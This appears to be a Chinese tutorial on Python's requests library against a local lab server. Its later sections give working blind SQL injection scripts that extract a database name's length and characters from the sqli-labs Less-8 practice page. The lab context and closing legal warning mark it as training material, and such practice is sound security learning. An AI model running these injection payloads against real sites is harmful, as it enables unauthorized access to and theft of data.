一、环境
1、python3
2、用到的模块requests
二、requests模块应用
1、获取网页的内容
# coding=utf-8 import requests res=requests.get("http://192.168.1.129/html/1.html") print(res.content.decode("utf-8"))
2、获取头信息
3、获取提交的网址
print(res.headers) print(res.url)
运行结果:
{'Date': 'Tue, 04 Aug 2020 13:01:06 GMT', 'Server': 'Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45', 'Last-Modified': 'Sun, 31 May 2020 15:48:24 GMT', 'ETag': '"676-5a6f39bc391c0"', 'Accept-Ranges': 'bytes', 'Content-Length': '1654', 'Keep-Alive': 'timeout=5, max=100', 'Connection': 'Keep-Alive', 'Content-Type': 'text/html'}
http://192.168.1.129/html/1.html
4、修改访问时UA信息
# coding=utf-8 import requests url="http://192.168.1.129/html/1.html" header={"User-Agent":"aiyoubucuo"} res=requests.get(url,headers=header) print(res.request.headers)
运行结果:
{'User-Agent': 'aiyoubucuo', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}
5、超时处理,网页超过三秒没有反应当做异常
# coding=utf-8 import requests url="http://192.168.1.129/html/chaoshi.php"
try:
res=requests.get(url,timeout=3) print(res.request.headers) except Exception as e: print("网页已超时!!!")
6、提交get数据
# coding=utf-8 import requests url="http://192.168.1.129/get.php" data={"aiyou":"bucuo"} res=requests.get(url,params=data) print(res.url)
运行结果:
http://192.168.1.129/get.php?aiyou=bucuo
7、POST提交数据
# coding=utf-8 import requests url="http://192.168.1.129/post.php" datas={"aiyou":"bucuo"} res=requests.post(url,data=datas) print(res.content.decode("utf-8"))
运行结果:
array(1) { ["aiyou"]=> string(5) "bucuo" }
8、上传文件
# coding=utf-8 import requests url="http://192.168.1.129/shangchuan.php" upfile={"file":open("123.txt","rb")} datas={"submit":"submit"} res=requests.post(url,files=upfile,data=datas) print(res.content.decode("utf-8"))
运行结果:
三、获取数据库长度
#判断数据库长度,http://192.168.1.129/sqli/Less-8/?id=8' and (length(database())) = 8 --+ # coding=utf-8 import requests url="http://192.168.1.129/sqli/Less-8/" reslen=len(requests.get(url=url+"?id=1").text) print("正常情况下网页返回数据的长度"+str(reslen)) dblen=0 while True: dburl=url+"?id=1'+and+(length(database()))="+str(dblen)+"--+" print(dburl) if len(requests.get(dburl).text)==reslen: print("数据库名字长度为:"+str(dblen)) break if dblen==30: print("出现错误!") break dblen+=1
运行结果:
四、获取数据库名字
# coding=utf-8 import string import requests url="http://192.168.1.129/sqli/Less-8/" reslen=len(requests.get(url=url+"?id=1").text) print("正常情况下网页返回数据的长度"+str(reslen)) #判断数据库长度,http://192.168.1.129/sqli/Less-8/?id=2' and (length(database())) = 8 --+ dblen=0 while True: dburl=url+"?id=1'+and+(length(database()))="+str(dblen)+"--+" print(dburl) if len(requests.get(dburl).text)==reslen: print("数据库名字长度为:"+str(dblen)) break if dblen==30: print("出现错误!") break dblen+=1 dbnmae="" #生成8个字母 for i in range(1,9): #获取字母从a-z for a in string.ascii_lowercase: dburl=url+"?id=1'+and+substr(database(),"+str(i)+",1)="+"'"+a+"'"+"--+" print(dburl) if len(requests.get(dburl).text)==reslen: dbnmae+=a print(dbnmae) break
运行结果:
禁止非法,后果自负
